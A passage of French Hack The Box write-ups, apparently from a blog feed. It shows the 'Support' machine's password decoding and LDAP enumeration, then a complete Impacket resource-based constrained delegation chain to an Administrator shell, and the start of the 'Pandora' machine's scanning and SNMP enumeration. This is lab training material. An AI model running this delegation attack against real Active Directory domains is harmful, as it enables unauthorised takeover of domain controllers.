class="c1"># Base64 decode</span> </span></span><span class="line"><span class="cl"><span class="n">enc_bytes</span> <span class="o">=</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64decode</span><span class="p">(</span><span class="n">enc_password</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">dec_bytes</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">enc_bytes</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">k</span> <span class="o">=</span> <span class="n">key</span><span class="p">[</span><span class="n">i</span> <span class="o">%</span> <span class="nb">len</span><span class="p">(</span><span class="n">key</span><span class="p">)]</span> </span></span><span class="line"><span class="cl"> <span class="n">dec_bytes</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">b</span> <span class="o">^</span> <span class="n">k</span> <span class="o">^</span> <span class="mh">0xDF</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">password</span> <span class="o">=</span> <span class="n">dec_bytes</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s2">&#34;utf-8&#34;</span><span class="p">,</span> <span class="n">errors</span><span class="o">=</span><span class="s2">&#34;ignore&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">password</span><span class="p">)</span> </span></span></code></pre></td></tr></table> </div> </div><p>En executant le python, on trouve le mot de passe :</p> <ul> <li>ldap : <code>nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz</code></li> </ul> <p>C&rsquo;est très intéressant car une autre méthode attendue était d&rsquo;executer le programme et d&rsquo;effectuer des requête <strong>ldap</strong> authentifiées avec le compte utilisateur &ldquo;ldap&rdquo;. Il suffisait de lancer <strong>wireshark</strong> et d&rsquo;analyser le trafic réseau afin de récupérer le mot de passe !</p> <p>Bien sûr, le jour de l&rsquo;OSCP il n&rsquo;y aura pas de <strong>chatBot</strong> autorisé donc il faut prioriser la seconde méthode, à moins que vous ayez un très bon décompilateur de code <strong>.NET</strong>.</p> <h3 id="rusthound--bloodhound--support-account">Rusthound / Bloodhound : &ldquo;support&rdquo; account </h3><p>On execute <strong>rusthound</strong> afin d&rsquo;extraire les informations du compte <strong>ldap</strong>, puis on fait une analyse sur bloodhound. On trouve le compte <strong>support</strong> qui semble être très intéressant car il existe une route permettant à cet utilisateur de prendre la main sur le <strong>DC</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ rusthound -d support.htb -u <span class="s2">&#34;ldap&#34;</span>@<span class="s2">&#34;support.htb&#34;</span> -p <span class="s1">&#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz&#39;</span> -o /workspace/Support/bloodhound_data --zip -n 10.10.11.174 </span></span><span class="line"><span class="cl">--------------------------------------------------- </span></span><span class="line"><span class="cl">Initializing RustHound at 23:06:53 on 09/09/25 </span></span><span class="line"><span class="cl">Powered by g0h4n from OpenCyber </span></span><span class="line"><span class="cl">--------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:53Z INFO rusthound<span class="o">]</span> Verbosity level: Info </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:53Z INFO rusthound::ldap<span class="o">]</span> Connected to SUPPORT.HTB Active Directory! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:53Z INFO rusthound::ldap<span class="o">]</span> Starting data collection... </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::ldap<span class="o">]</span> All data collected <span class="k">for</span> NamingContext <span class="nv">DC</span><span class="o">=</span>support,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::parser<span class="o">]</span> Starting the LDAP objects parsing... </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::parser::bh_41<span class="o">]</span> MachineAccountQuota: <span class="m">10</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::parser<span class="o">]</span> Parsing LDAP objects finished! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::checker<span class="o">]</span> Starting checker to replace some values... </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::checker<span class="o">]</span> Checking and replacing some values finished! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">21</span> users parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">61</span> groups parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">2</span> computers parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">1</span> ous parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">1</span> domains parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">2</span> gpos parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">21</span> containers parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-09T21:06:54Z INFO rusthound::json::maker<span class="o">]</span> /workspace/Support/bloodhound_data/20250909230654_support-htb_rusthound.zip created! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">RustHound Enumeration Completed at 23:06:54 on 09/09/25! Happy Graphing! </span></span></code></pre></td></tr></table> </div> </div><p><img src="https://leopoldabgn.github.io/writeups/p/support-htb/image-1.png" width="788" height="415" srcset="https://leopoldabgn.github.io/writeups/p/support-htb/image-1_hu_1817b7955d20e3e3.png 480w, https://leopoldabgn.github.io/writeups/p/support-htb/image-1_hu_5ada8719d0f0d65.png 1024w" loading="lazy" alt="Support account can generic all on DC" class="gallery-image" data-flex-grow="189" data-flex-basis="455px" ></p> <p>On remarque que le compte <strong>support</strong> fait parti du groupe <strong>SHARED SUPPORT ACCOUNTS</strong>, qui a le droit <strong>GENERIC ALL</strong> sur le DC.</p> <p>Cependant, on ne trouve a aucun moyen de récupérer le compte <strong>support</strong>.</p> <h3 id="ldapsearch--supports-password">ldapsearch : support&rsquo;s password </h3><p>En analysant les données de l&rsquo;Active Directory directement avec <strong>ldapsearch</strong>, on observe un champs <strong>&ldquo;info&rdquo;</strong> qu&rsquo;on ne pouvait pas voir sur bloodhound. Il contient&hellip; le mot de passe de l&rsquo;utilisateur <strong>support</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ldapsearch -x -H ldap://10.10.11.174 -D <span class="s2">&#34;support\ldap&#34;</span> -w <span class="s1">&#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz&#39;</span> -b <span class="s2">&#34;DC=support,DC=htb&#34;</span> <span class="p">|</span> grep -i <span class="s2">&#34;sAMAccountName.*support&#34;</span> -A10 -B25 </span></span><span class="line"><span class="cl">distinguishedName: <span class="nv">CN</span><span class="o">=</span>support,CN<span class="o">=</span>Users,DC<span class="o">=</span>support,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl">instanceType: <span class="m">4</span> </span></span><span class="line"><span class="cl">whenCreated: 20220528111200.0Z </span></span><span class="line"><span class="cl">whenChanged: 20220528111201.0Z </span></span><span class="line"><span class="cl">uSNCreated: <span class="m">12617</span> </span></span><span class="line"><span class="cl">info: Ironside47pleasure40Watchful <span class="c1"># &lt;&lt;&lt;&lt;&lt;-------- HERE</span> </span></span><span class="line"><span class="cl">memberOf: <span class="nv">CN</span><span class="o">=</span>Shared Support Accounts,CN<span class="o">=</span>Users,DC<span class="o">=</span>support,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl">memberOf: <span class="nv">CN</span><span class="o">=</span>Remote Management Users,CN<span class="o">=</span>Builtin,DC<span class="o">=</span>support,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl">uSNChanged: <span class="m">12630</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">lastLogon: <span class="m">0</span> </span></span><span class="line"><span class="cl">pwdLastSet: <span class="m">132982099209777070</span> </span></span><span class="line"><span class="cl">primaryGroupID: <span class="m">513</span> </span></span><span class="line"><span class="cl">objectSid:: <span class="nv">AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA</span><span class="o">==</span> </span></span><span class="line"><span class="cl">accountExpires: <span class="m">9223372036854775807</span> </span></span><span class="line"><span class="cl">logonCount: <span class="m">0</span> </span></span><span class="line"><span class="cl">sAMAccountName: support </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="generic-all-on-dc--resource-based-constrained-delegation-attack">Generic All on DC : Resource-Based Constrained Delegation Attack </h3><p>Nous avons observé auparavant que <strong>support</strong> appartient à un groupe ayant le droite &ldquo;GENERIC ALL&rdquo; sur le DC.<br> Il faut alors exploiter une <strong>Resource-Based Constrained Delegation</strong> Attack.</p> <p>En utilisant les conseils donnés par <strong>bloodhound</strong>, voici un exemple d&rsquo;exploitation :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># First, if an attacker does not control an account with an SPN set, a new attacker-controlled computer account can be added with Impacket&#39;s addcomputer.py example script:</span> </span></span><span class="line"><span class="cl">$ addcomputer.py -computer-name <span class="s1">&#39;HACKED$&#39;</span> -computer-pass <span class="s1">&#39;hacked123!&#39;</span> -dc-host DC.SUPPORT.HTB -domain-netbios support.htb support.htb/<span class="s1">&#39;support&#39;</span>:<span class="s1">&#39;Ironside47pleasure40Watchful&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully added machine account HACKED$ with password hacked123!. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># We now need to configure the target object so that the attacker-controlled computer can delegate to it. Impacket&#39;s rbcd.py script can be used for that purpose:</span> </span></span><span class="line"><span class="cl">$ rbcd.py -delegate-from <span class="s2">&#34;HACKED</span>$<span class="s2">&#34;</span> -delegate-to <span class="s1">&#39;DC$&#39;</span> -dc-ip <span class="s2">&#34;10.10.11.174&#34;</span> -action write <span class="s2">&#34;support.htb&#34;</span>/<span class="s2">&#34;support&#34;</span>:<span class="s1">&#39;Ironside47pleasure40Watchful&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Delegation rights modified successfully! </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> HACKED$ can now impersonate users on DC$ via S4U2Proxy </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Accounts allowed to act on behalf of other identity: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> HACKED$ <span class="o">(</span>S-1-5-21-1677581083-3380853377-188903654-5601<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># And finally we can get a service ticket for the service name (sname) we want to &#34;pretend&#34; to be &#34;admin&#34; for. Impacket&#39;s getST.py example script can be used for that purpose.</span> </span></span><span class="line"><span class="cl">$ getST.py -spn CIFS/dc.support.htb -impersonate Administrator -dc-ip <span class="s2">&#34;10.10.11.174&#34;</span> <span class="s2">&#34;support.htb&#34;</span>/<span class="s1">&#39;HACKED$&#39;</span>:<span class="s1">&#39;hacked123!&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> CCache file is not found. Skipping... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Getting TGT <span class="k">for</span> user </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Impersonating Administrator </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting S4U2self </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting S4U2Proxy </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saving ticket in Administrator@CIFS_dc.support.htb@SUPPORT.HTB.ccache </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ mv Administrator@CIFS_dc.support.htb@SUPPORT.HTB.ccache admin.ccache </span></span><span class="line"><span class="cl">$ <span class="nb">export</span> <span class="nv">KRB5CCNAME</span><span class="o">=</span><span class="s2">&#34;admin.ccache&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># This ticket can then be used with Pass-the-Ticket, and could grant access to the file system of the TARGETCOMPUTER.</span> </span></span><span class="line"><span class="cl">$ psexec.py -k -no-pass support.htb/Administrator@dc.support.htb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting shares on dc.support.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found writable share ADMIN$ </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Uploading file phZHHPqE.exe </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Opening SVCManager on dc.support.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Creating service YbSC on dc.support.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting service YbSC..... </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Press <span class="nb">help</span> <span class="k">for</span> extra shell commands </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.20348.859<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\s</span>upport<span class="se">\D</span>esktop<span class="se">\u</span>ser.txt </span></span><span class="line"><span class="cl">1e30.....0c23 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\r</span>oot.txt </span></span><span class="line"><span class="cl">a848.....12cf </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><p>Je n&rsquo;ai pas trouvé le mot de passe de l&rsquo;utilisateur <strong>support</strong> avec <strong>ldapsearch</strong>.</p> <p>Conseil: Après de longues recherches sur <strong>bloodhound</strong>, si on trouve un compte et/ou un groupe intéressant, toujours les analyser avec <strong>ldapsearch</strong> après, pour vérifier qu&rsquo;il n&rsquo;y pas d&rsquo;infos supplémentaires tel qu&rsquo;un mot de passe dans une variable de description par exemple.</p>https://leopoldabgn.github.io/writeups/p/pandora-htb/Fri, 05 Sep 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/pandora-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Pandora cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Pandora</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.136</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">daniel : HotelBabylon23 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap-tcp">nmap TCP </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.136 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">3072</span> 24c295a5c30b3ff3173c68d7af2b5338 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3...........Dd8TnI/DFFs<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> b1417799469a6c5dd2982fc0329ace03 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLX..........Dea3F/CxfOQeqLpanqso/EqXcT9w<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> e736433ba9478a190158b2bc89f65108 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOCMYY9DMj/I+Rfosf+yMuevI7VFIeeQfZSxq67EGxsb </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET POST OPTIONS HEAD </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Play <span class="p">|</span> Landing </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="website-port-80">Website (port 80) </h3><p>Rien d&rsquo;intéressant ! Le site est basé sur une template bootstrap, mais rien a signalé. Pas de fichiers suspects, pas de CVE, pas de XSS ou d&rsquo;injection SQL.</p> <h3 id="nmap-udp">nmap UDP </h3><p>Après un scan du top 1000 des ports <strong>UDP</strong>, on remarque le port 161 avec un serveur <strong>SNMP</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sU -sV --top-ports <span class="m">1000</span> -T4 -vvv 10.10.11.136 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">23/udp open<span class="p">|</span>filtered telnet no-response </span></span><span class="line"><span class="cl">161/udp open snmp udp-response ttl <span class="m">63</span> SNMPv1 server<span class="p">;</span> net-snmp SNMPv3 server <span class="o">(</span>public<span class="o">)</span> </span></span><span class="line"><span class="cl">177/udp open<span class="p">|</span>filtered xdmcp no-response </span></span><span class="line"><span class="cl">520/udp open<span class="p">|</span>filtered route no-response </span></span><span class="line"><span class="cl">539/udp open<span class="p">|</span>filtered apertus-ldp no-response </span></span><span class="line"><span class="cl">688/udp open<span class="p">|</span>filtered realm-rusd no-response </span></span><span class="line"><span class="cl">782/udp open<span class="p">|</span>filtered hp-managed-node no-response </span></span><span class="line"><span class="cl">983/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">1026/udp open<span class="p">|</span>filtered win-rpc no-response </span></span><span class="line"><span class="cl">1038/udp open<span class="p">|</span>filtered mtqp no-response </span></span><span class="line"><span class="cl">1419/udp open<span class="p">|</span>filtered timbuktu-srv3 no-response </span></span><span class="line"><span class="cl">1719/udp open<span class="p">|</span>filtered h323gatestat no-response </span></span><span class="line"><span class="cl">2161/udp open<span class="p">|</span>filtered apc-2161 no-response </span></span><span class="line"><span class="cl">2967/udp open<span class="p">|</span>filtered symantec-av no-response </span></span><span class="line"><span class="cl">4008/udp open<span class="p">|</span>filtered netcheque no-response </span></span><span class="line"><span class="cl">5001/udp open<span class="p">|</span>filtered commplex-link no-response </span></span><span class="line"><span class="cl">6004/udp open<span class="p">|</span>filtered X11:4 no-response </span></span><span class="line"><span class="cl">16739/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">17585/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">17823/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">18485/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">18987/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">19140/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">19315/udp open<span class="p">|</span>filtered keyshadow no-response </span></span><span class="line"><span class="cl">19632/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">19682/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">20003/udp open<span class="p">|</span>filtered commtact-https no-response </span></span><span class="line"><span class="cl">20004/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">20791/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">21320/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">21524/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">21923/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">22053/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">27899/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">31625/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">32772/udp open<span class="p">|</span>filtered sometimes-rpc8 no-response </span></span><span class="line"><span class="cl">33354/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">37393/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">40708/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">44508/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">49152/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">49222/udp open<span class="p">|</span>filtered unknown no-response </span></span><span class="line"><span class="cl">Service Info: Host: pandora </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="snmpwalk--daniel">snmpwalk : daniel </h3><p>On utilise le logiciel <strong>snmpwalk</strong> pour afficher diverses informations :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ snmpwalk -v2c -c public 10.10.11.136 </span></span><span class="line"><span class="cl">iso.3.6.1.2.1.1.1.0 <span class="o">=</span> STRING: <span class="s2">&#34;Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64&#34;</span> </span></span><span class="line"><span class="cl">iso.3.6.1.2.1.1.2.0 